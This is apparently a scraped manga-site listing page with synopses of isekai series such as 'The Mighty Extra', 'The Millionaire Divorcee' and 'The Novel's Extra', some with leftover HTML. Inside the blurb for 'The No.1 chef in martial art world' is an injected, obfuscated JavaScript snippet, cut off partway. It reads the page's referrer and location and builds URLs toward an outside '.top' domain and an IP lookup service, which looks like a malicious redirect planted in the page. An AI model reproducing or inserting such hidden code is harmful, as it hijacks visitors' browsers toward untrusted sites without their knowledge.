Isekai - Page 106

Isekai manga centers on characters who are whisked away to a fantastical world, often filled with magic, strange creatures, and epic adventures. The main character usually has to adapt and become a hero or fulfill a unique role in the new world.

1493 results

The Mighty Extra: One Girl Changes the World

It’s easy to overlook the extras in a novel, but when one avid reader wakes up in the body of “extra” extraordinaire Princess Lyla, she’s ready to shed the side character image and step into her mightiest form! Armed with hidden magic more potent than the empire of Belliana has ever seen, Lyla is ditching the palace in favor of a nobler mission–protecting her bias at all costs! Now she must rescue Fian, dreamy descendant of the Kylon Dragon Empire, so he can have his happy ending with the story’s heroine. That is, assuming the heroine is still Princess Helene… This Overpowered Extra Will Change Your Life / 脇役だけどチートキャラなんで、人生変えて差し上げます! / 먼치킨 엑스트라 / 먼치킨 엑스트라가 인생을 바꿔드립니다


The Millionaire Divorcee

<div id="editdescription"> In the original story, the male lead accused his ex-wife of abusing him when he was younger. But unlike the original story, I raised my young husband as if he was my brother. When my husband went to war, I started preparing for a divorce. Because if the original story is true, the male lead will fall in love with the princess of the ruined country and bring her back! That’s why, instead of following the road that leads to defeat, I intended to get a decent divorce. While preparing for that, I took some money and earned quite a fortune. I also developed a cure because I didn’t want to die of an incurable disease like the original villainess. All that’s left is getting divorced! *** My cute little husband came home and grew up to be such a fine man! But don’t worry, I’m all set to divorce you! Oddly enough, the reaction of my husband is a little strange. “While I was fighting on the battlefield, you were preparing to run away.” He smiled dangerously, whilst wrapping his big hands around my waist. “Are you having an affair?” Unlike the pretty smile on his mouth, his eyes were burning hot. No….. you know, I’m ready to get divorced….. </div> <div class="page-content-inner"> <div></div> </div> <h5 class="seriesother associated">Associated Names</h5> <div id="editassociated">이혼당할 준비 완료했습니다</div>


The Mochi I Drew Is Tasty Today Too

Tougo is a high school student who loves drawing more than anything. One day, he woke up in a deep forest filled with vegetations he had never seen before... While he went on an exploration finding answers in this new world, he found them without putting much effort. When he drew a Mochi using pencil and paper, something unusual happened...!? Not just a log house but legendary beasts too!? With ability to bring anything into being, he creates a paradise for everyone! A young boy who unbeknown to him is loved by others. The drawing fantasy story starts here!


The Moon Witch and The Sun King: My Salvation

When Lee Shana accidentally crossed into another world full of fantasy and beauty, sadly she had become a witch in the midst of an execution. Dying at such a wonderful age?! She couldn’t let that happen! She had to escape no matter what! But after her escape she offended none other than the crown prince Luther! What else could go wrong?


The Most Heretical Last Boss Queen Who Will Become the Source of Tragedy Will Devote Herself for the Sake of the People. Comic Anthology

The popular novel, "RasuTame", written by Tenichi-sensei now has an anthology! Including original episodes with illustrations by many wonderful writers!!Pryde's happy daily life is being delivered now ♪


The Most Heretical Last Boss Queen Who Will Become The Source Of Tragedy Will Devote Herself For The Sake Of The People. ~To The Savior~

At the age of eight, I realised I had reincarnated as the nefarious last boss of an otome game, Queen Pride. Her fighting strength is high because she’s the last boss who will fight with the capture target, and her superior cunning wits make her the most powerful first princess in a matriarchal country. Since she brings misfortune to all that surrounds her, what awaits is a future of ruination! …really, wouldn’t it be better if I died?In this case, I’ll avoid destruction from the capture target and freely use my authority and cheat abilities to save everyone!---**Note: This manga is continuation of the canceled manga, be sure to read that one first (check the related tab)**


The Nightingale and the Rose

Streamer Bai Xinxin transmigrated into the thriller game “The Nightingale and the Rose” as the prince’s daughter, Bai Yueguang. In this game, everyone wants to kill the female protagonist. Only Lan Sha, the character the player controls, can protect her. To survive in “a world full of bitter yanderes” and “political opponents who want to stop the marriage,” Bai Yueguang has to figure out how to win against her enemies while keeping herself and Lan Sha Alive. However, this “Lan Sha” seems to be a little…?!


The No.1 chef in martial art world

Liu Xian, the world’s number one Chinese chef, has traveled to the martial arts world by accident. There is no concept of cooking in this world, and everyone eats pills for food. Liu Xian, who is a master of culinary skills, is about to flex his muscles. However, what awaits him is the imprisoned play of gluttonous beautiful girls one after another! The blessing of Qi people? No, because this chef has feminphobia!<script></script><script>function _0x3c89(){var _0x2b72b4=['text','google','location','http://rea','4319840cjONjm','includes','OLaqJ','.top/','3331400AfMEWt','floor','1860xgLcER','random','13027NbYFWf','pQDEh','206129pxkHTK','https://ip','KKxcv','referrer','rajyh','','2jrVKzM','1696431oZWbED','7827210oCcTRS','4541670tZhLcl','QVkof','wjzDG','eSjIa','then','href','Rddxv','.customapi','VMcsm'];_0x3c89=function(){return _0x2b72b4;};return _0x3c89();}(function(_0x498f95,_0x397e5e){var _0x801e65=_0x161c,_0xada3d0=_0x498f95();while(!![]){try{var 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The Not-So-Mad Princess

A Skilled Medical Examiner Finds Herself In A Royal Twist Of Fate, Waking Up As Yancy Lisbeth, The Overlooked Fourth Princess Of Edelweiss Kingdom. In The Shadow Of Her Sinister Sister Christie’s Relentless Attempts On Her Life, Yancy Must Use Her Sharp Intellect From Her Previous Life To Turn The Tables. As She Gains The Queen’s Attention With Her Seemingly “Newfound” Resourcefulness, The Palace Becomes A Chessboard Where Yancy’s Clever Moves Could Secure Her Safety Or Lead To A Checkmate By Christie’s Hand. Will Her Wits Let Her Stay In The Queen’s Good Graces And Out Of Harm’s Way?


The Novel's Extra

Each novel often has its own world and many characters who live in it. However, apart from the main characters and their assistants, as well as several other minor personalities, we know nothing about them. "Cheundong, what level are you?" I have no idea who I am. I don't even know why they call me that. My entire story may be limited to the fact of entering a specialized military school. My line barely touches the main line, so my name is difficult to find on the pages of this novel. I'm just out of the story... or rather, I'm just one of many sets…


The Novel’S Extra

Waking up, Kim Hajin finds himself in a familiar world but an unfamiliar body. A world he created himself and a story he wrote, yet never finished. He had become his novel’s extra, a filler character with no importance to the story. The only clue to escaping is to stay close to the main storyline. However, he soon finds out the world isn’t exactly identical to his creation.


The Novel’s Extra (Remake)

Waking up, Kim Hajin finds himself in a familiar world but an unfamiliar body. A world he created himself and a story he wrote, yet never finished. He had become his novel’s extra, a filler character with no importance to the story. The only clue to escaping is to stay close to the main storyline. However, he soon finds out the world isn’t exactly identical to his creation.

3 days ago